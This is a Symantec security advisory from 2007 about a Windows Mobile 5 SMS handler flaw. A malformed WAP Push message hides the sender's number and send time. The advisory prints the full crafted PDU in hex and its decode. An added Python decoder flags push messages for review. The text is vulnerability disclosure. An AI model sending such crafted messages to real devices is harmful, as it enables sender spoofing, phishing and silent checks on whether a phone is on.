-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Symantec Vulnerability Research
http://www.symantec.com/research
Security Advisory

Advisory ID: SYMSA-2007-011
Advisory Title: Microsoft Windows Mobile 5 PocketPC Phone Edition
                SMS Handler Issue With Regard to Malformed WAP Push
                Messages Hiding Source
Author: Ollie Whitehouse / ollie_whitehouse@symantec.com
Release Date: 17-10-2007
Application: Microsoft Windows Mobile 5 PocketPC
Platform: Windows
Severity: Information Disclosure
Vendor status: Vendor Reviewed
CVE Number: CVE-2007-5493
Reference: http://www.securityfocus.com/bid/26019

Overview:

Microsoft Windows Mobile 6 is the latest version of Microsoft's
mobile operating system. Designed for small embedded devices,
Windows Mobile is the CE feature set designed for PDAs and mobile
telephones. Microsoft Windows Mobile comes in three distinct
flavors: Pocket PC, Pocket PC Phone Edition and SmartPhone.

A vulnerability has been discovered in the SMS handler on
Windows Mobile 2005 Pocket PC Phone Edition: the sender of the
original SMS message can be masked from the recipient when the
recipient is sent a specially crafted WAP PUSH message.

Details:

Symantec discovered that a slightly malformed WAP PUSH message
could be used to hide the originating sender of the message on
Windows Mobile 2005. The original PDU can be seen in [1]. The
following PDU will cause the Pocket PC Phone Edition SMS handler
to decode the PDU incorrectly, with the result that both the
sending telephone number and the sending time are incorrect.

[1] PDU (Line wrapped)
079144775810065051220C914477619269060004A7600605040B8423F025060803AE81EA
AF82B48401056A0045C6070D0373796D616E7465630085010353796D616E7465630D0D62
756C6B534D532028556E726567697374657265642056657229202D204C6F6769784D6F62
696C652E636F6D000101

The decode of the PDU can be seen in [2]. This decode was produced
with PDUSpy from http://www.nobbi.com/pduspy.htm. When this message
is received by a SmartPhone it will be silently discarded, which
can also be useful to an attacker who wishes to ascertain whether a
cellphone is on without alerting the user, by means of SMS delivery
receipts.

[2] Decode of PDU from PDUSpy

PDU LENGTH IS 118 BYTES
ADDRESS OF DELIVERING SMSC
NUMBER IS : +447785016005
TYPE OF NR. : International
NPI : ISDN/Telephone (E.164/163)

MESSAGE HEADER FLAGS
MESSAGE TYPE : SMS SUBMIT
REJECT DUPLICATES : NO
VALIDITY PERIOD : RELATIVE
REPLY PATH : NO
USER DATA HEADER : PRESENT
REQ. STATUS REPORT : NO
MSG REFERENCE NR. : 34 (0x22)

DESTINATION ADDRESS
NUMBER IS : +447716299660
TYPE OF NR. : International
NPI : ISDN/Telephone (E.164/163)

PROTOCOL IDENTIFIER (0x00)
MESSAGE ENTITIES : SME-to-SME
PROTOCOL USED : Implicit / SC-specific

DATA CODING SCHEME (0x04)
AUTO-DELETION : OFF
COMPRESSION : OFF
MESSAGE CLASS : NONE
ALPHABET USED : 8bit data

VALIDITY OF MESSAGE : 24.0 hrs

USER DATA PART OF SM
USER DATA LENGTH : 96 octets
UDH LENGTH : 6 octets
UDH : 05 04 0B 84 23 F0
UDH ELEMENTS : 05 - Appl. port addressing 16bit
4 (0x04) Bytes Information Element
09200 : SOURCE port is: allocated by IANA
02948 : DESTINATION port is: allocated by IANA
--- DATA ----------------------
05 04 0B 84 23 F0
USER DATA (TEXT) : %=AE=81=EA=AF=82=B4=84jE=C6
symantec=85Symantec
bulkSMS (Unregistered Ver) -
LogixMobile.com
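
The fields in [2] can be reproduced by walking the octets of the PDU in [1]. The following is an added example, not part of the Symantec advisory and not PDUSpy's code: it parses the SMS-SUBMIT layout (GSM 03.40) for 8-bit data only and flags the 16-bit port-addressing header whose destination port is 2948, the value shown in [2]. The function names, dictionary keys and the WAP_PUSH_PORT constant are assumptions of this example.

```python
# Added example (not from the advisory): decode the SMS-SUBMIT PDU of listing [1].
PDU_HEX = (
    "079144775810065051220C914477619269060004A7600605040B8423F025060803AE81EA"
    "AF82B48401056A0045C6070D0373796D616E7465630085010353796D616E7465630D0D62"
    "756C6B534D532028556E726567697374657265642056657229202D204C6F6769784D6F62"
    "696C652E636F6D000101"
)
WAP_PUSH_PORT = 2948  # destination port reported in decode [2]

def bcd_number(octets, toa):
    """Decode swapped-nibble digits, drop 0xF padding, add '+' if international."""
    digits = "".join(f"{b & 0x0F:X}{b >> 4:X}" for b in octets).rstrip("F")
    return ("+" if (toa >> 4) & 0x07 == 1 else "") + digits

def decode_submit(pdu_hex):
    raw = bytes.fromhex(pdu_hex)
    smsc = bcd_number(raw[2:1 + raw[0]], raw[1])   # length octet, type, digits
    pos = 1 + raw[0]
    first = raw[pos]                               # TP first octet (header flags)
    if first & 0x03 != 0x01:
        raise ValueError("not an SMS-SUBMIT TPDU")
    mr, da_digits, da_toa = raw[pos + 1], raw[pos + 2], raw[pos + 3]
    pos += 4
    da_octets = (da_digits + 1) // 2               # address length counts digits
    dest = bcd_number(raw[pos:pos + da_octets], da_toa)
    pos += da_octets
    dcs = raw[pos + 1]                             # raw[pos] is TP-PID
    if dcs != 0x04:
        raise ValueError("this example only handles 8-bit data (DCS 0x04)")
    vpf = (first >> 3) & 0x03                      # 0 = no VP, 2 = relative
    pos += 2 + {0: 0, 2: 1}.get(vpf, 7)            # enhanced/absolute VP: 7 octets
    udl = raw[pos]
    ud = raw[pos + 1:pos + 1 + udl]
    if len(ud) != udl:
        raise ValueError("user data shorter than TP-UDL")
    dst_port, src_port, payload = None, None, ud
    if first & 0x40 and ud:                        # TP-UDHI: header present
        udh, payload = ud[1:1 + ud[0]], ud[1 + ud[0]:]
        i = 0
        while i + 2 <= len(udh):                   # walk the information elements
            iei, ielen = udh[i], udh[i + 1]
            if iei == 0x05 and ielen == 4 and i + 6 <= len(udh):  # 16-bit ports
                dst_port, src_port = (int.from_bytes(udh[i + k:i + k + 2], "big") for k in (2, 4))
            i += 2 + ielen
    return {"smsc": smsc, "mr": mr, "dest": dest, "udl": udl, "payload": payload,
            "dst_port": dst_port, "src_port": src_port, "wap_push": dst_port == WAP_PUSH_PORT}

if __name__ == "__main__":
    print(decode_submit(PDU_HEX))
```

The same port check can be applied on an SMS gateway or in message logs to single out port-addressed push messages for review.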



Vendor Response:

A vulnerability has been discovered in the SMS handler. If a
malicious message with no sender was received by a user on their
device, the user may be enticed into taking action or clicking the
URI that could lead to a second order attack.

Mitigating Factors: By default Windows mobile device policy requires
SI messages to be authenticated. The Mobile Operators have the
ability to change the policy to not require authentication in
order for 3rd party ring tones and other SI messages.

Microsoft will look into a different architecture in future versions.

Recommendation:

Contact your mobile operator to ensure the proper policy is set on
your device.

Common Vulnerabilities and Exposures (CVE) Information:

The Common Vulnerabilities and Exposures (CVE) project has assigned
the following names to these issues. These are candidates for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.

CVE-2007-5493

- -------Symantec Vulnerability Research Advisory Information-------

For questions about this advisory, or to report an error:
research@symantec.com

For details on Symantec's Vulnerability Reporting Policy:
http://www.symantec.com/research/Symantec-Responsible-Disclosure.pdf

Symantec Vulnerability Research Advisory Archive:
http://www.symantec.com/research/

Symantec Vulnerability Research GPG Key:
http://www.symantec.com/research/Symantec_Vulnerability_Research_GPG.asc

- -------------Symantec Product Advisory Information-------------

To Report a Security Vulnerability in a Symantec Product:
secure@symantec.com

For general information on Symantec's Product Vulnerability
reporting and response:
http://www.symantec.com/security/

Symantec Product Advisory Archive:
http://www.symantec.com/avcenter/security/SymantecAdvisories.html

Symantec Product Advisory PGP Key:
http://www.symantec.com/security/Symantec-Vulnerability-Management-Key.asc

- ---------------------------------------------------------------

Copyright (c) 2007 by Symantec Corp.
Permission to redistribute this alert electronically is granted
as long as it is not edited in any way unless authorized by
Symantec Consulting Services. Reprinting the whole or part of
this alert in any medium other than electronically requires
permission from research@symantec.com.

Disclaimer
The information in the advisory is believed to be accurate at the
time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS
condition. There are no warranties with regard to this information.
Neither the author nor the publisher accepts any liability for any
direct, indirect, or consequential loss or damage arising from use
of, or reliance on, this information.

Symantec, Symantec products, and Symantec Consulting Services are
registered trademarks of Symantec Corp. and/or affiliated companies
in the United States and other countries. All other registered and
unregistered trademarks represented in this document are the sole
property of their respective companies/owners.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)

iD8DBQFHFlXzuk7IIFI45IARAk+NAKCk8GGaxtg7Z9g0zBTX8BzHt9LPkwCgwOeD
1qhcVHQ07YHEdgF0zUP81/k=
=pFeF
-----END PGP SIGNATURE-----